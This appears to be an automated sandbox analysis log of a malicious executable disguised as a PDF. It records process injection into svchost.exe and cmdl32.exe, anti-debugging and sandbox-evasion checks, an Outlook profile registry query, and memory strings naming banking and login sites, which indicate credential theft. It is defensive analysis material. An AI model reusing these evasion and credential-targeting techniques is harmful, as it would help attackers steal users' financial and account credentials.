Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmdl32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Product Data Specifications_PDF.exe | Static file information: File size 1335877 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EyHLOQmzGKBL.exe, 0000000B.00000002.3150184532.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158489815.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cmdl32.pdb source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0040EBD0 LoadLibraryA,GetProcAddress
Source: Product Data Specifications_PDF.exe | Static PE information: real checksum: 0xa961f should be: 0x151e8c
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00416CB5 push ecx; ret 6_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_004180C9 push ds; retf 9_2_004180ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00414177 push ds; iretd 9_2_0041417A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00403100 push eax; ret 9_2_00403102
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_004181E3 push 00000012h; iretd 9_2_004181B2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_004181B0 push 00000012h; iretd 9_2_004181B2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040828D push ebp; retf 9_2_004082AE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040D2BC push edi; ret 9_2_0040D2BD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0041EB64 push ecx; ret 9_2_0041EB78
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00406B35 push FFFFFFBFh; ret 9_2_00406B37
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_004083B5 push edx; ret 9_2_004083D1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040D43C push ds; retf 9_2_0040D43D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00414CFF pushfd ; ret 9_2_00414D00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040D5EF push dword ptr [eax]; ret 9_2_0040D5F8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00416753 push edi; retf 9_2_0041675E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00416752 push edi; retf 9_2_0041675E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00417FD0 push ds; retf 9_2_004180ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036309AD push ecx; mov dword ptr [esp], ecx 9_2_036309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0360135F push eax; iretd 9_2_03601369
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04DC27FA pushad ; ret 12_2_04DC27F9
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04DC225F pushad ; ret 12_2_04DC27F9
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04DC283D push eax; iretd 12_2_04DC2858
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04DF09AD push ecx; mov dword ptr [esp], ecx 12_2_04DF09B6
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BB0A56 push E65B4B16h; iretd 12_2_02BB0A5B
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BA4ECF push ds; retf 12_2_02BA4FEA
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BA4FC6 push ds; retf 12_2_02BA4FEA
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02B952B2 push edx; ret 12_2_02B952CE
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BA50AD push 00000012h; iretd 12_2_02BA50AF
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BA50E0 push 00000012h; iretd 12_2_02BA50AF
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BA1074 push ds; iretd 12_2_02BA1077
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02B9518A push ebp; retf 12_2_02B951AB
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmdl32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe API/Special instruction interceptor: Address: 4005AF4
            Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\cmdl32.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367096E rdtsc 9_2_0367096E
            Source: C:\Windows\SysWOW64\cmdl32.exe Window / User API: threadDelayed 2055
            Source: C:\Windows\SysWOW64\cmdl32.exe Window / User API: threadDelayed 7918
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_6-87828
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe API coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\cmdl32.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596 Thread sleep count: 2055 > 30
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596 Thread sleep time: -4110000s >= -30000s
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596 Thread sleep count: 7918 > 30
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 7596 Thread sleep time: -15836000s >= -30000s
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe TID: 7644 Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\SysWOW64\cmdl32.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cmdl32.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00452492
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00442886
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_004788BD
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 6_2_004339B6
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 6_2_0045CAFA
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00431A86
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 6_2_0044BD27
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045DE8F FindFirstFileW,FindClose, 6_2_0045DE8F
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_0044BF8B
            Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BAC980 FindFirstFileW,FindNextFileW,FindClose, 12_2_02BAC980
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 6_2_0040E500
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CDYNVMware20,11696492231p
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20
            Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,1169649
            Source: 635gG211.12.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 635gG211.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 635gG211.12.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nge Transaction PasswordVMware20,11696492231^
            Source: 635gG211.12.dr Binary or memory string: outlook.office.comVMware20,11696492231s
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,116C
            Source: 635gG211.12.dr Binary or memory string: AMC password management pageVMware20,11696492231
            Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3157755641.00000000008EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
            Source: 635gG211.12.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 635gG211.12.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,116
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: zure.comVMware20,11696492231j
            Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 635gG211.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 635gG211.12.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 635gG211.12.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 635gG211.12.dr Binary or memory string: discord.comVMware20,11696492231f
            Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2088257723.00000193E0A4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 635gG211.12.dr Binary or memory string: global block list test formVMware20,11696492231
            Source: 635gG211.12.dr Binary or memory string: dev.azure.comVMware20,11696492231j
            Source: 635gG211.12.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 635gG211.12.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 635gG211.12.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 635gG211.12.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231[
            Source: 635gG211.12.dr Binary or memory string: tasks.office.comVMware20,11696492231o
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Transaction PasswordVMware20,11696492231}
            Source: 635gG211.12.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 635gG211.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: blocklistVMware20,11696492231
            Source: cmdl32.exe, 0000000C.00000002.3161379449.0000000008115000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware
            Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 635gG211.12.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 635gG211.12.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 635gG211.12.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 635gG211.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 635gG211.12.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe API call chain: ExitProcess graph end node graph_6-86953
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cmdl32.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367096E rdtsc 9_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00417993 LdrLoadDll, 9_2_00417993
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045A370 BlockInput, 6_2_0045A370
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 6_2_0040D590
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040EBD0 LoadLibraryA,GetProcAddress, 6_2_0040EBD0
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04002558 mov eax, dword ptr fs:[00000030h] 6_2_04002558
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_040025B8 mov eax, dword ptr fs:[00000030h] 6_2_040025B8
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04004700 mov eax, dword ptr fs:[00000030h] 6_2_04004700
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04005D60 mov eax, dword ptr fs:[00000030h] 6_2_04005D60
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04005DC0 mov eax, dword ptr fs:[00000030h] 6_2_04005DC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D437C mov eax, dword ptr fs:[00000030h] 9_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B2349 mov eax, dword ptr fs:[00000030h] 9_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov ecx, dword ptr fs:[00000030h] 9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B035C mov eax, dword ptr fs:[00000030h] 9_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FA352 mov eax, dword ptr fs:[00000030h] 9_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D8350 mov ecx, dword ptr fs:[00000030h] 9_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0370634F mov eax, dword ptr fs:[00000030h] 9_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03708324 mov eax, dword ptr fs:[00000030h] 9_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03708324 mov ecx, dword ptr fs:[00000030h] 9_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03708324 mov eax, dword ptr fs:[00000030h] 9_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03708324 mov eax, dword ptr fs:[00000030h] 9_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h] 9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h] 9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0366A30B mov eax, dword ptr fs:[00000030h] 9_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0362C310 mov ecx, dword ptr fs:[00000030h] 9_2_0362C310
